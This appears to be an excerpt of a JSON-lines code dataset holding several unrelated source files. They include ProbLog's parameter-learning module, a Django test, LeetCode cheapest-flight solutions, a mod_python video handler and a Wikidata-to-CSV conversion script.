%s: %s\" % (self.iteration, score)\n )\n delta = score - prev_score\n prev_score = score\n return prev_score\n\n\nclass ExampleSet(object):\n def __init__(self):\n self._examples = {}\n\n def add(self, index, atoms, values, cvalues):\n ex = self._examples.get((atoms, values))\n if ex is None:\n self._examples[(atoms, values)] = Example(index, atoms, values, cvalues)\n else:\n ex.add_index(index, cvalues)\n\n def __iter__(self):\n return iter(self._examples.values())\n\n def __len__(self):\n return len(self._examples)\n\n\nclass Example(object):\n def __init__(self, index, atoms, values, cvalues):\n \"\"\"An example consists of a list of atoms and their corresponding values (True/False).\n Different continuous values are all mapped to True and stored in self.n.\n \"\"\"\n self.atoms = tuple(atoms)\n self.values = tuple(values)\n self.compiled = []\n self.n = {tuple(cvalues): [index]}\n\n def __hash__(self):\n return hash((self.atoms, self.values))\n\n def __eq__(self, other):\n if other is None:\n return False\n return self.atoms == other.atoms and self.values == other.values\n\n def compile(self, lfi, baseprogram):\n ground_program = None # Let the grounder decide\n # print(\"compile grounding:\")\n # print(\"...\")\n # print(\"Grounded Atoms\", self.atoms)\n\n ground_program = ground(\n baseprogram,\n ground_program,\n evidence=list(zip(self.atoms, self.values)),\n propagate_evidence=lfi.propagate_evidence,\n )\n # print(\"...\")\n # # print(ground_program.to_prolog())\n # print(ground_program)\n\n lfi_queries = []\n for i, node, t in ground_program:\n if (\n t == \"atom\"\n and isinstance(node.probability, Term)\n and node.probability.functor == \"lfi\"\n ):\n factargs = ()\n # # print(\"node.identifier\", node.identifier)\n if node.name.functor != \"choice\":\n if node.name.functor == \"lfi_fact\":\n for arg in node.name.args:\n if str(arg.functor) == \"t\":\n factargs = arg.args\n else:\n factargs = node.name.args\n elif type(node.identifier) == tuple:\n factargs = node.identifier[1]\n # fact = Term('lfi_fact', node.probability.args[0], node.probability.args[1], *factargs)\n # fact = Term('lfi_fact', node.probability.args[0], node.probability.args[1])\n fact = Term(\"lfi_fact\", node.probability.args[0], Term(\"t\", *factargs))\n # print(\"Adding query: \", fact, i)\n ground_program.add_query(fact, i)\n\n # tmp_body = Term('lfi_body', node.probability.args[0], node.probability.args[1], *factargs)\n # tmp_body = Term('lfi_body', node.probability.args[0], node.probability.args[1])\n tmp_body = Term(\n \"lfi_body\", node.probability.args[0], Term(\"t\", *factargs)\n )\n lfi_queries.append(tmp_body)\n # print(\"Adding query: \", tmp_body, i)\n # tmp_par = Term('lfi_par', node.probability.args[0], node.probability.args[1], *factargs)\n # tmp_par = Term('lfi_par', node.probability.args[0], node.probability.args[1])\n tmp_par = Term(\n \"lfi_par\", node.probability.args[0], Term(\"t\", *factargs)\n )\n lfi_queries.append(tmp_par)\n # print(\"Adding query: \", tmp_par, i)\n elif (\n t == \"atom\"\n and isinstance(node.probability, Term)\n and node.probability.functor == \"clfi\"\n ):\n factargs = ()\n if type(node.identifier) == tuple:\n factargs = node.identifier[1]\n # fact = Term('clfi_fact', node.probability.args[0], node.probability.args[1], *factargs)\n # fact = Term('clfi_fact', node.probability.args[0], node.probability.args[1])\n fact = Term(\"clfi_fact\", node.probability.args[0], Term(\"t\", *factargs))\n ground_program.add_query(fact, i)\n elif t == \"atom\":\n # TODO: check if non-lfi and continuous and save locations to replace later\n # lfi continuous probs are associated with lfi/2\n pass\n\n ground_program = ground(\n baseprogram,\n ground_program,\n evidence=list(zip(self.atoms, self.values)),\n propagate_evidence=lfi.propagate_evidence,\n queries=lfi_queries,\n )\n # print(\"New ground_program\")\n # print(ground_program)\n\n self.compiled = lfi.knowledge.create_from(ground_program)\n # print(\"Compiled program:\")\n # print(\"\\t\" + self.compiled.to_prolog().replace(\"\\n\", \"\\n\\t\"))\n\n def add_index(self, index, cvalues):\n k = tuple(cvalues)\n if k in self.n:\n self.n[k].append(index)\n else:\n self.n[k] = [index]\n\n\nclass ExampleEvaluator(SemiringDensity):\n def __init__(self, weights, eps):\n SemiringDensity.__init__(self)\n self._weights = weights\n self._cevidence = None\n self._eps = eps\n\n def _get_weight(self, index, args, strict=True):\n index = int(index)\n weight = self._weights[index]\n if isinstance(weight, dict):\n if strict:\n return weight[args]\n else:\n return weight.get(args)\n else:\n return weight\n\n def _get_cweight(self, index, args, atom, strict=True):\n # TODO: Should we cache this? This method is called multiple times with the same arguments\n index = int(index)\n dist = self._weights[index]\n if isinstance(dist, dict):\n if strict:\n dist = dist[args]\n else:\n raise ProbLogError(\n \"Continuous distribution is not available for {}, {}\".format(\n index, args\n )\n )\n if not isinstance(dist, Term):\n raise ProbLogError(\n \"Expected a continuous distribution, got {}\".format(dist)\n )\n value = self._cevidence.get(atom)\n if value is not None:\n p = dist_prob(dist, value, eps=self._eps)\n else:\n raise ProbLogError(\"Expected continuous evidence for {}\")\n return p\n\n def is_dsp(self):\n \"\"\"Indicates whether this semiring requires solving a disjoint sum problem.\"\"\"\n return True\n\n def in_domain(self, a):\n return True # TODO implement\n\n def value(self, a):\n \"\"\"Overrides from SemiringProbability.\n Replaces a weight of the form ``lfi(i, t(...))`` by its current estimated value.\n Other weights are passed through unchanged.\n :param a: term representing the weight\n :type a: Term\n :return: current weight\n :rtype: float\n \"\"\"\n if isinstance(a, Term) and a.functor == \"lfi\":\n # index = int(a.args[0])\n return self._get_weight(*a.args)\n elif isinstance(a, Term) and a.functor == \"clfi\":\n return self._get_cweight(*a.args)\n else:\n return float(a)\n\n def __call__(self, example):\n # print(\"__call__\")\n \"\"\"Evaluate the model with its current estimates for all examples.\"\"\"\n # # print('=========>>>')\n at = example.atoms\n val = example.values\n comp = example.compiled\n results = []\n for cval, n in example.n.items():\n results.append(self._call_internal(at, val, cval, comp, n))\n # # print('<<<=========')\n # print(\"__call__.results = \", results)\n return results\n\n def _call_internal(self, at, val, cval, comp, n):\n # print(\"__call_internal__\")\n # # print('=========')\n # # print('ExampleEvaluator.__call__({},{},{},{})'.format(n, at, val, cval))\n # # print('_weights: ', self._weights)\n evidence = {}\n self._cevidence = {}\n # p_values = {}\n for a, v, cv in zip(at, val, cval):\n if a in evidence:\n if cv is not None:\n if self._cevidence[a] != cv:\n context = \" (found evidence({},{}) and evidence({},{}) in example {})\".format(\n a,\n evidence[a],\n a,\n cv,\n \",\".join([str(ni) for ni in n])\n if isinstance(n, list)\n else n + 1,\n )\n raise InconsistentEvidenceError(source=a, context=context)\n if evidence[a] != v:\n context = \" (found evidence({},{}) and evidence({},{}) in example {})\".format(\n a,\n evidence[a],\n a,\n v,\n \",\".join([str(ni) for ni in n])\n if isinstance(n, list)\n else n + 1,\n )\n raise InconsistentEvidenceError(source=a, context=context)\n else:\n if cv is not None:\n self._cevidence[a] = cv\n evidence[a] = v\n\n p_values = {}\n # TODO: this loop is not required if there are no clfi_facts\n for idx, node, ty in comp:\n if ty == \"atom\":\n name = node.name\n if (\n name is not None and name.functor == \"clfi_fact\"\n ): # TODO: when is this wrapped in 'choice'? Before compilation?\n clfi = node.probability\n ev_atom = clfi.args[2]\n value = self._cevidence.get(ev_atom)\n if value is not None:\n p_values[node.name] = value\n\n try:\n # TODO: The next step generates the entire formula if it is density and this is redone later (caching?)\n evaluator = comp.get_evaluator(semiring=self, evidence=evidence)\n except InconsistentEvidenceError as err:\n n = \",\".join([str(ni + 1) for ni in n]) if isinstance(n, list) else n + 1\n context = err.context + \" (example {})\".format(n)\n raise InconsistentEvidenceError(err.source, context)\n\n p_queries = {}\n # Probability of query given evidence\n for name, node, label in evaluator.formula.labeled():\n if name.functor not in [\"lfi_body\", \"lfi_par\"]:\n continue\n # print(\"evaluate start {}\".format(name), node)\n w = evaluator.evaluate(node)\n # print(\"evaluate {}: {} ({})\".format(name, w, len(n)))\n # w = evaluator.evaluate_fact(node)\n # print (\"WWW\", w, w1, w2)\n if isinstance(w, DensityValue):\n # # print(\"{} => {}\".format(w, float(w)))\n # w = float(w)\n p_queries[name] = w\n elif w < 1e-6: # TODO: too high for multivariate dists?\n p_queries[name] = 0.0\n else:\n p_queries[name] = w\n # print(\"_call_internal.evaluate_evidence\")\n p_evidence = evaluator.evaluate_evidence()\n # print(\"_call_internal.result\", p_evidence, \"\\n\", p_queries, \"\\n\\n \".join([str(v) for v in p_values.items()]),)\n\n return len(n), p_evidence, p_queries, p_values\n\n\nclass ExampleEvaluatorLog(SemiringLogProbability):\n def __init__(self, weights, eps):\n SemiringLogProbability.__init__(self)\n self._weights = weights\n self._cevidence = None\n self._eps = eps\n\n def _get_weight(self, index, args, strict=True):\n index = int(index)\n weight = self._weights[index]\n if isinstance(weight, dict):\n if strict:\n weight = weight[args]\n else:\n weight = weight.get(args, 0.0)\n try:\n result = math.log(weight)\n except ValueError:\n return float(\"-inf\")\n return result\n\n def _get_cweight(self, index, args, atom, strict=True):\n # TODO: Should we cache this? This method is called multiple times with the same arguments\n index = int(index)\n dist = self._weights[index]\n if isinstance(dist, dict):\n if strict:\n dist = dist[args]\n else:\n raise ProbLogError(\n \"Continuous distribution is not available for {}, {}\".format(\n index, args\n )\n )\n if not isinstance(dist, Term):\n raise ProbLogError(\n \"Expected a continuous distribution, got {}\".format(dist)\n )\n value = self._cevidence.get(atom)\n if value is not None:\n p = dist_prob(dist, value, log=True, eps=self._eps)\n else:\n raise ProbLogError(\"Expected continuous evidence for {}\")\n return p\n\n def value(self, a):\n \"\"\"Overrides from SemiringProbability.\n Replaces a weight of the form ``lfi(i, t(...))`` by its current estimated value.\n Other weights are passed through unchanged.\n :param a: term representing the weight\n :type a: Term\n :return: current weight\n :rtype: float\n \"\"\"\n if isinstance(a, Term) and a.functor == \"lfi\":\n # index = int(a.args[0])\n rval = self._get_weight(*a.args)\n elif isinstance(a, Term) and a.functor == \"clfi\":\n rval = self._get_cweight(*a.args)\n else:\n rval = math.log(float(a))\n return rval\n\n def __call__(self, example):\n \"\"\"Evaluate the model with its current estimates for all examples.\"\"\"\n # # print('=========>>>')\n at = example.atoms\n val = example.values\n comp = example.compiled\n results = []\n for cval, n in example.n.items():\n results.append(self._call_internal(at, val, cval, comp, n))\n # # print('<<<=========')\n return results\n\n def _call_internal(self, at, val, cval, comp, n):\n # # print('=========')\n # # print('ExampleEvaluator.__call__({},{},{},{})'.format(n, at, val, cval))\n # # print('_weights: ', self._weights)\n evidence = {}\n self._cevidence = {}\n # p_values = {}\n for a, v, cv in zip(at, val, cval):\n # # print('__call__', a, v, cv)\n if a in evidence:\n if cv is not None:\n if self._cevidence[a] != cv:\n context = \" (found evidence({},{}) and evidence({},{}) in example {})\".format(\n a,\n evidence[a],\n a,\n cv,\n \",\".join([str(ni) for ni in n])\n if isinstance(n, list)\n else n + 1,\n )\n raise InconsistentEvidenceError(source=a, context=context)\n if evidence[a] != v:\n context = \" (found evidence({},{}) and evidence({},{}) in example {})\".format(\n a,\n evidence[a],\n a,\n v,\n \",\".join([str(ni) for ni in n])\n if isinstance(n, list)\n else n + 1,\n )\n raise InconsistentEvidenceError(source=a, context=context)\n else:\n if cv is not None:\n self._cevidence[a] = cv\n evidence[a] = v\n\n p_values = {}\n # TODO: this loop is not required if there are no clfi_facts\n for idx, node, ty in comp:\n if ty == \"atom\":\n name = node.name\n # TODO: when is this wrapped in 'choice'? Before compilation?\n if name is not None and name.functor == \"clfi_fact\":\n clfi = node.probability\n ev_atom = clfi.args[2]\n value = self._cevidence.get(ev_atom)\n if value is not None:\n p_values[node.name] = value\n\n try:\n evaluator = comp.get_evaluator(semiring=self, evidence=evidence)\n except InconsistentEvidenceError as err:\n n = \",\".join([str(ni + 1) for ni in n]) if isinstance(n, list) else n + 1\n context = err.context + \" (example {})\".format(n)\n raise InconsistentEvidenceError(err.source, context)\n\n p_queries = {}\n # Probability of query given evidence\n for name, node, label in evaluator.formula.labeled():\n w = evaluator.evaluate_fact(node)\n # if w < 1e-6: # TODO: too high for multivariate dists\n # # print('Set w to 0: ', w)\n # p_queries[name] = 0.0\n # else:\n p_queries[name] = w\n # TODO: p_evidence becomes too small for many continuous observations\n p_evidence = evaluator.evaluate_evidence()\n # # print('__call__.result', p_evidence, '\\n', p_queries, '\\n', '\\n '.join([str(v) for v in p_values.items()]))\n return len(n), p_evidence, p_queries, p_values\n\n\ndef extract_evidence(pl):\n engine = DefaultEngine()\n atoms = engine.query(pl, Term(\"evidence\", None, None))\n atoms1 = engine.query(pl, Term(\"evidence\", None))\n atoms2 = engine.query(pl, Term(\"observe\", None))\n for atom in atoms1 + atoms2:\n atom = atom[0]\n if atom.is_negated():\n atoms.append((-atom, Term(\"false\")))\n else:\n atoms.append((atom, Term(\"true\")))\n result = []\n for at, vl in atoms:\n vlr = str2bool(vl)\n vlv = None\n if vlr is None: # TODO: also check that atom is a continuous distribution\n vlr, vlv = str2num(vl)\n result.append((at, vlr, vlv))\n # return [(at, str2bool(vl)) for at, vl in atoms]\n return result\n\n\ndef read_examples(*filenames):\n for filename in filenames:\n engine = DefaultEngine()\n\n with open(filename) as f:\n example = \"\"\n for line in f:\n if line.strip().startswith(\"---\"):\n pl = PrologString(example)\n atoms = extract_evidence(pl)\n if len(atoms) > 0:\n yield atoms\n example = \"\"\n else:\n example += line\n if example:\n pl = PrologString(example)\n atoms = extract_evidence(pl)\n if len(atoms) > 0:\n yield atoms\n\n\nclass DefaultDict(object):\n def __init__(self, base):\n self.base = base\n\n def __getitem__(self, key):\n return self.base.get(key, Var(key))\n\n\ndef run_lfi(program, examples, output_model=None, **kwdargs):\n lfi = LFIProblem(program, examples, **kwdargs)\n score = lfi.run()\n\n if output_model is not None:\n with open(output_model, \"w\") as f:\n f.write(lfi.get_model())\n\n names = []\n weights = []\n for i, name in enumerate(lfi.names):\n weights_i = lfi.get_weights(i)\n for w_args, w_val in weights_i:\n translate = {k: v for k, v in zip(name.probability.args[1:], w_args.args)}\n names.append(name.apply(DefaultDict(translate)))\n weights.append(w_val)\n\n return score, weights, names, lfi.iteration, lfi\n\n\ndef argparser():\n import argparse\n\n parser = argparse.ArgumentParser(\n description=\"Learning from interpretations with ProbLog\"\n )\n parser.add_argument(\"model\")\n parser.add_argument(\"examples\", nargs=\"+\")\n parser.add_argument(\"-n\", dest=\"max_iter\", default=10000, type=int)\n parser.add_argument(\"-d\", dest=\"min_improv\", default=1e-10, type=float)\n parser.add_argument(\n \"-o\",\n \"--output-model\",\n type=str,\n default=None,\n help=\"write resulting model to given file\",\n )\n parser.add_argument(\"--logger\", type=str, default=None, help=\"write log to file\")\n parser.add_argument(\n \"-k\",\n \"--knowledge\",\n dest=\"koption\",\n choices=get_evaluatables(),\n default=None,\n help=\"knowledge compilation tool\",\n )\n parser.add_argument(\n \"-l\",\n \"--leak-probabilities\",\n dest=\"leakprob\",\n type=float,\n help=\"Add leak probabilities for evidence atoms.\",\n )\n parser.add_argument(\n \"--propagate-evidence\",\n action=\"store_true\",\n dest=\"propagate_evidence\",\n default=True,\n help=\"Enable evidence propagation\",\n )\n parser.add_argument(\n \"--dont-propagate-evidence\",\n action=\"store_false\",\n dest=\"propagate_evidence\",\n default=True,\n help=\"Disable evidence propagation\",\n )\n parser.add_argument(\n \"--eps\",\n type=float,\n default=1e-4,\n help=\"Smallest difference between continuous values (default 1e-4)\",\n )\n normalize_group = parser.add_mutually_exclusive_group()\n normalize_group.add_argument(\n \"--normalize\",\n action=\"store_true\",\n dest=\"normalize\",\n default=True,\n help=\"Normalize AD-weights (default).\",\n )\n normalize_group.add_argument(\n \"--nonormalize\",\n action=\"store_false\",\n dest=\"normalize\",\n help=\"Do not normalize AD-weights.\",\n )\n parser.add_argument(\"-v\", \"--verbose\", action=\"count\", default=0)\n parser.add_argument(\"--web\", action=\"store_true\", help=argparse.SUPPRESS)\n parser.add_argument(\n \"-a\",\n \"--arg\",\n dest=\"args\",\n action=\"append\",\n help=\"Pass additional arguments to the cmd_args builtin.\",\n )\n\n return parser\n\n\ndef create_logger(name, verbose):\n levels = [logging.WARNING, logging.INFO, logging.DEBUG] + list(range(9, 0, -1))\n verbose = max(0, min(len(levels) - 1, verbose))\n logger = getLogger(name)\n ch = logging.StreamHandler(sys.stdout)\n formatter = logging.Formatter(\"[%(levelname)s] %(message)s\")\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n logger.setLevel(levels[verbose])\n\n\ndef lfi_wrapper(plfile, evfiles, knowledge, options):\n program = PrologFile(plfile)\n examples = list(read_examples(*evfiles))\n return run_lfi(program, examples, knowledge=get_evaluatable(knowledge), **options)\n\n\ndef main(argv, result_handler=None):\n parser = argparser()\n args = parser.parse_args(argv)\n\n if result_handler is None:\n if args.web:\n result_handler = print_result_json\n else:\n result_handler = print_result\n\n knowledge = get_evaluatable(args.koption)\n\n if args.logger is None:\n outf = None\n else:\n outf = open(args.logger, \"w\")\n\n logger = init_logger(verbose=args.verbose, name=\"problog_lfi\", out=outf)\n create_logger(\"problog\", args.verbose - 1)\n\n program = PrologFile(args.model)\n examples = list(read_examples(*args.examples))\n if len(examples) == 0:\n logger.warning(\"no examples specified\")\n else:\n logger.info(\"Number of examples: %s\" % len(examples))\n options = vars(args)\n del options[\"examples\"]\n\n try:\n results = run_lfi(program, examples, knowledge=knowledge, **options)\n\n for n in results[2]:\n n.loc = program.lineno(n.location)\n retcode = result_handler((True, results), output=outf)\n except Exception as err:\n trace = traceback.format_exc()\n err.trace = trace\n retcode = result_handler((False, err), output=outf)\n\n if args.logger is not None:\n outf.close()\n\n if retcode:\n sys.exit(retcode)\n\n\ndef print_result(d, output, precision=8):\n success, d = d\n if success:\n score, weights, names, iterations, lfi = d\n weights_print = []\n for weight in weights:\n if isinstance(weight, Term) and weight.functor in cdist_names:\n weights_print.append(weight)\n else:\n weights_print.append(round(float(weight), precision))\n # print(score, weights, names, iterations, file=output)\n return 0\n else:\n # print(process_error(d), file=output)\n return 1\n\n\ndef print_result_json(d, output, precision=8):\n import json\n\n success, d = d\n if success:\n score, weights, names, iterations, lfi = d\n results = {\n \"SUCCESS\": True,\n \"score\": score,\n \"iterations\": iterations,\n \"weights\": [\n [str(n), round(w, precision), n.loc[1], n.loc[2]]\n for n, w in zip(names, weights)\n ],\n \"model\": lfi.get_model(),\n }\n # print(json.dumps(results), file=output)\n else:\n results = {\"SUCCESS\": False, \"err\": vars(d)}\n # print(json.dumps(results), file=output)\n return 0\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"problog/learning/lfi.py","file_name":"lfi.py","file_ext":"py","file_size_in_byte":80764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"222616294","text":"from django.test.testcases import TestCase\nfrom SuiSiannAdminApp.models import 句表\nfrom SuiSiannAdminApp.management.提原始漢羅kah漢羅 import 提原始漢羅kah漢羅\n\n\nclass 提原始漢羅kah漢羅單元試驗(TestCase):\n def test_提兩筆(self):\n 句1 = 句表.objects.create(\n 原始漢字=\"媠姑娘\",\n 原始臺羅=\"suí koo-niû\",\n 漢字=\"媠\",\n 臺羅=\"suí\"\n )\n pk1 = str(句1.pk)\n 句2 = 句表.objects.create(\n 原始漢字=\"豬\",\n 原始臺羅=\"ti\",\n 漢字=\"豬仔\",\n 臺羅=\"ti-á\"\n )\n pk2 = str(句2.pk)\n self.assertEqual(提原始漢羅kah漢羅(), (\n [\n pk1, \"媠姑娘\", \"suí koo-niû\", pk2, \"豬\", \"ti\",\n ], [\n pk1, \"媠\", \"suí\", pk2, \"豬仔\", \"ti-á\",\n ],\n ))\n","sub_path":"tests/SuiSiannAdminApp/management/test提原始漢羅kah漢羅單元試驗.py","file_name":"test提原始漢羅kah漢羅單元試驗.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"359391851","text":"class Solution(object):\n ## TLE\n def findCheapestPrice(self, n, flights, src, dst, k):\n \"\"\"\n :type n: int\n :type flights: List[List[int]]\n :type src: int\n :type dst: int\n :type K: int\n :rtype: int\n \"\"\"\n from collections import defaultdict\n # flights.sort()\n # flights.p()\n dst_dict = defaultdict(list)\n n = len(flights)\n for s, d, p in flights:\n dst_dict[s] += (d, p),\n visited = set()\n # res = [float('inf')]\n # mem = {}\n def dfs(src, stop_n, cur_p):\n # (src, stop_n, cur_p).p()\n # if (src,stop_n) in mem: return mem[(src,stop_n)]\n if stop_n > k: return float('inf')\n res_list = []\n for d, p in dst_dict[src]:\n if d in visited:\n continue\n visited.add(d)\n np = cur_p + p\n if d == dst:\n res_list += np,\n else:\n res_list += dfs(d, stop_n+1, np),\n visited.discard(d)\n res = min(res_list) if res_list else float('inf')\n # if (src,stop_n) in mem:\n # res = min(mem[(src,stop_n)], res) \n # mem[(src,stop_n)] = res\n return res\n visited.add(src) \n res = dfs(src, 0, 0)\n if res == float('inf'): return -1\n return res\n\nclass Solution(object):\n # https://en.wikipedia.org/wiki/Dijkstra%27s_algorithm\n def findCheapestPrice(self, n, flights, src, dst, k):\n \"\"\"\n :type n: int\n :type flights: List[List[int]]\n :type src: int\n :type dst: int\n :type K: int\n :rtype: int\n \"\"\"\n from collections import defaultdict\n from heapq import heappop, heappush\n dst_dict = defaultdict(set)\n visited = set()\n for s, d, p in flights:\n dst_dict[s].add((d,p))\n q = []\n heappush(q,(0, src, k+1))\n visited.add(src)\n while q:\n sum_p, s, count = heappop(q)\n visited.add(s)\n if s == dst: return sum_p\n if count > 0:\n for d, p in dst_dict[s]:\n if d not in visited:\n heappush(q, (sum_p+p, d, count-1))\n return -1\n\n\n\n\n\n\nif __name__ == '__main__':\n from minitest import *\n\n with test(\"Solution\"):\n Solution().findCheapestPrice(3,\n [[0,1,100],[1,2,100],[0,2,500]],\n 0,2,1).must_equal(200)\n Solution().findCheapestPrice(3,\n [[0,1,100],[1,2,100],[0,2,500]],\n 0,2,0).must_equal(500)\n Solution().findCheapestPrice(5,\n [[4,1,1],[1,2,3],[0,3,2],[0,4,10],[3,1,1],[1,4,3]],\n 2,1,1).must_equal(-1)\n Solution().findCheapestPrice(10,\n [[3,4,4],[2,5,6],[4,7,10],[9,6,5],[7,4,4],[6,2,10],[6,8,6],[7,9,4],[1,5,4],[1,0,4],[9,7,3],[7,0,5],[6,5,8],[1,7,6],[4,0,9],[5,9,1],[8,7,3],[1,2,6],[4,1,5],[5,2,4],[1,9,1],[7,8,10],[0,4,2],[7,2,8]],\n 6,0,7).must_equal(14)\n","sub_path":"python/leetcode/graph/787_Cheapest_Flights_Within_K_Stops.py","file_name":"787_Cheapest_Flights_Within_K_Stops.py","file_ext":"py","file_size_in_byte":3144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"6681671","text":"# coding=utf-8\n\n# Copyright (C) 2015 Daniel Schäfer \n#\n# Permission is hereby granted, free of charge, to any person\n# obtaining a copy of this software and associated documentation\n# files (the \"Software\"), to deal in the Software without\n# restriction, including without limitation the rights to use,\n# copy, modify, merge, publish, distribute, sublicense, and/or\n# sell copies of the Software, and to permit persons to whom\n# the Software is furnished to do so, subject to the following\n# conditions:\n#\n# The above copyright notice and this permission notice shall be\n# included in all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\n# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE\n# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR\n# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS\n# OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR\n# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR\n# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE\n# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\nfrom mod_python import apache\nfrom mod_python import util\nimport pkgutil\nfrom handler import Handler\nfrom fetcher import InputDataIncorrect\n\ndef index(req):\n req.content_type = \"text/html\"\n start(req)\n return\n\ndef check_packages(req):\n modules = pkgutil.iter_modules()\n for each in modules:\n req.write(each[1] + \"\\n\")\n\ndef start(req):\n form = util.FieldStorage(req)\n directory = 'YOUR_SAVE_FILE_DIRECTORY'\n api_key = 'YOUR_API_KEY'\n username = form.getfirst('user')\n if not username:\n raise InputDataIncorrect('Specify the username with the \\'user\\' GET attribute.')\n\n handling = Handler(directory, api_key, username, 50)\n handling.add_to_watched(form.getfirst('watched'))\n handling.add_video(form.getfirst('add_video'))\n handling.save()\n req.write(handling.build_html())\n\n if not form.getfirst('watched'):\n handling.update_videos()\n req.write('Refresh the page to see new videos.')\n","sub_path":"index_mod_python.py","file_name":"index_mod_python.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"550329766","text":"import json\nimport codecs\n\ndef fix_string(s):\n return s.replace(',', '').replace('\"', '').replace('\\\\', '').replace('\\n', '')\n\ndef parse_time(time, precision):\n # llega algo como +2013-01-01T00:00:00Z\n state = 0\n year = ''\n month = ''\n day = ''\n for a in time:\n if state == 0:\n if a == '-':\n year += a\n state = 1\n elif state == 1: # leyendo el anio\n if a == '-':\n state = 2\n else:\n year += a\n elif state == 2: # leyendo el mes\n if a == '-':\n state = 3\n else:\n month += a\n elif state == 3: # leyendo el dia\n if a == 'T':\n break\n else:\n day += a\n \n if int(month) == 0 or precision < 10:\n fix_month = ''\n else:\n fix_month = str(int(month))\n \n if int(day) == 0 or precision < 11:\n fix_day = ''\n else:\n fix_day = str(int(day))\n \n \n return year, fix_month, fix_day\n\ndef xstr(s):\n if s is None:\n return ''\n return str(s)\n\nlang_labels = []\nlang_descriptions = []\nlang_aliases = []\n\nfile_labels = open('./language-labels', 'r')\nfile_descriptions = open('./language-description', 'r')\nfile_aliases = open('./language-aliases', 'r')\n\nlang_labels = file_labels.read().splitlines()\nlang_descriptions = file_descriptions.read().splitlines()\nlang_aliases = file_aliases.read().splitlines()\n\nfile_labels.close()\nfile_descriptions.close()\nfile_aliases.close()\n\nentity_type = \"\"\nrelationship = \"\"\nitem_to = \"\"\nstring_value = \"\"\n\n# wikidata json\njson_file = codecs.open('../Downloads/wikidata.json', 'r', encoding='utf-8')\n\n# nodes\ncsv_entities = codecs.open('./entity.csv', 'w', encoding='utf-8')\ncsv_strings = codecs.open('./string.csv', 'w', encoding='utf-8')\ncsv_time = codecs.open('./time.csv', 'w', encoding='utf-8')\ncsv_quantity = codecs.open('./quantity.csv', 'w', encoding='utf-8')\ncsv_qualifiers = codecs.open('./qualifiers.csv', 'w', encoding='utf-8')\ncsv_url = codecs.open('./url.csv', 'w', encoding='utf-8')\ncsv_monolingual = codecs.open('./monolingual.csv', 'w', encoding='utf-8')\ncsv_commons = codecs.open('./commons.csv', 'w', encoding='utf-8')\ncsv_globe = codecs.open('./globe.csv', 'w', encoding='utf-8')\ncsv_claims = codecs.open('./claims.csv', 'w', encoding='utf-8')\ncsv_references = codecs.open('./references.csv', 'w', encoding='utf-8')\n\n# relationships\ncsv_relationships = codecs.open('./relationships.csv', 'w', encoding='utf-8')\n\ncsv_claims.write ('id:ID\\n')\ncsv_qualifiers.write ('id:ID\\n')\ncsv_references.write ('id:ID\\n')\ncsv_entities.write ('id:ID,:LABEL')\ncsv_commons.write ('id:ID,value\\n')\ncsv_url.write ('id:ID,value\\n')\ncsv_strings.write ('id:ID,value\\n')\ncsv_time.write ('id:ID,value,timezone,before,after,precision,year:long,month:int,day:int\\n')\ncsv_quantity.write ('id:ID,value,unit,upperBound,lowerBound\\n')\ncsv_globe.write ('id:ID,value,latitude,longitude,altitude,precision,globe\\n')\ncsv_monolingual.write ('id:ID,value,language\\n')\n\ncsv_relationships.write (':START_ID,:END_ID,:TYPE\\n')\n\n# writing the header for entities.csv\nfor l in lang_labels:\n csv_entities.write(',label_' + l)\nfor d in lang_descriptions:\n csv_entities.write(',description_' + d)\nfor a in lang_aliases:\n csv_entities.write(',alias_' + a + ':string[]')\ncsv_entities.write('\\n')\n\n# first line is a {\nline = json_file.readline()\nline_number = 1\n\n#initializing generated ids\nurl_generated_id = 0\nmono_generated_id = 0\ntime_generated_id = 0\nclaim_generated_id = 0\nglobe_generated_id = 0\nstring_generated_id = 0\ncommons_generated_id = 0\nquantity_generated_id = 0\nqualifier_generated_id = 0\nreference_generated_id = 0\n\n\nwhile True:\n line = json_file.readline()\n line_number += 1\n if not line:\n break\n\n # last line in json is different\n if line[-2] == ',':\n fixline = line[:-2]\n else:\n fixline = line[:-1]\n\n try:\n j = json.loads(fixline)\n except ValueError:\n print('invalid line in json file: ' + str(line_number) + '.')\n continue\n\n entity_id = j['id']\n entity_type = j['type']\n\n entity_labels = dict()\n entity_descriptions = dict()\n entity_aliases = dict()\n\n if 'labels' in j:\n labels = j['labels']\n for l in labels:\n lang = j['labels'][l]['language']\n if 'value' in j['labels'][l]:\n value = j['labels'][l]['value']\n entity_labels.update( {lang: value} )\n else:\n print('linea:' + str(line_number) + ', entity id:' + entity_id + ', label: lenguaje sin value.\\n')\n \n if 'descriptions' in j:\n descriptions = j['descriptions']\n for d in descriptions:\n lang = j['descriptions'][d]['language']\n if 'value' in j['descriptions'][d]:\n value = j['descriptions'][d]['value']\n entity_descriptions.update( {lang: value} )\n else:\n print('linea:' + str(line_number) + ', entity id:' + entity_id + ', description: lenguaje sin value.\\n')\n \n if 'aliases' in j:\n aliases = j['aliases']\n for alias in aliases:\n lang = j['aliases'][alias][0]['language']\n a_array = j['aliases'][alias]\n value_array = []\n for a in a_array:\n value_array.append(a['value'])\n entity_aliases.update( {lang: value_array} )\n\n # write the item/property in entities.csv\n if entity_type == 'item':\n csv_entities.write(entity_id + ',Item;Entity')\n elif entity_type == 'property':\n csv_entities.write(entity_id + ',Property;Entity')\n else:\n print('Entity no es Item ni Property, linea:' + str(line_number))\n\n for l 